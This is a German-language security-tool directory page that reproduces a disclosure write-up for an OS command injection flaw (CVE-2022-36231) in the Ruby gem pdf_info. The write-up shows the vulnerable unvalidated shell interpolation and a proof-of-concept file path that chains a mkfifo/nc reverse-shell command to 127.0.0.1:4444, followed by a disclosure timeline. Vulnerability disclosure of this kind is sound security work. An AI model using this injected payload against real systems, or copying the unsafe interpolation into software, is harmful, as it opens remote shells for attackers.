Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2022-36231 — pdf_info <= 0.5.3 OS Command Injection | Kitploit
Tools/GitHubGitHub/affix/cve-2022-36231
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingCommand and ControlPayload Development
GitHubaffix/cve-2022-36231

CVE-2022-36231

pdf_info <= 0.5.3 OS Command Injection

Repository anzeigen
53vor 3 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2022-36231

Das Ruby-Gem pdf_info <= 0.5.3 ist anfällig für OS Command Injection bei der Ausführung einer Methode auf einem PDF::Info-Objekt.

Ein Angreifer kann mithilfe eines speziell präparierten Payloads OS-Befehle durch Befehlschaining (command chaining) ausführen.

Schwachstellenanalyse

Beim Erstellen eines neuen PDF::Info-Objekts wird der initialize-Befehl aufgerufen

root@kitploit:~
def initialize(pdf_path)
  @pdf_path = pdf_path
end

Während der Objektinitialisierung wird keine Validierung durchgeführt und der vom Benutzer bereitgestellte Pfad wird verwendet.

Wir können ein PDF::Info-Objekt erstellen und die Metadaten einer PDF-Datei wie folgt zurückgeben.

root@kitploit:~
#!/usr/bin/env ruby

require 'pdf/info'

info = PDF::Info.new("./pdf/sample1.pdf")
pp info.metadata

Wenn wir die metadata-Methode auf dem PDF::Info-Objekt aufrufen, erfolgt ein Aufruf der process_output-Methode, wobei das Argument die command-Methode ist.

Die command-Methode verwendet die Klassenvariable @pdf_info, um den pdfinfo-Befehl auf dem System auszuführen, wobei der folgende Codeausschnitt verwendet wird, um die Ausgabe des Befehls zurückzugeben.

root@kitploit:~
output = `#{self.class.command_path} -enc UTF-8 -f 1 -l -1 "#{@pdf_path}" 2> /dev/null`

Wie bei der initialize-Methode wird auch bei der Variablen @pdf_path keine Validierung durchgeführt. Dies ermöglicht es uns, Befehlschaining mit ; zu verwenden, um einen beliebigen Befehl auszuführen.

root@kitploit:~
info = PDF::Info.new('pdf/sample1.pdf; $(rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 127.0.0.1 4444>/tmp/f)')

pp info.metadata

Der obige Codeausschnitt führt eine Reverse Shell zu 127.0.0.1 auf Port 4444 aus.

Shell

Offenlegungsdetails

  • 2022-07-20 :: An Anbieter gemeldet
  • 2022-08-30 :: Nachfrage beim Anbieter
  • 2022-09-30 :: CVE beantragt
  • 2022-10-26 :: Schwachstelle veröffentlicht
Tool herunterladen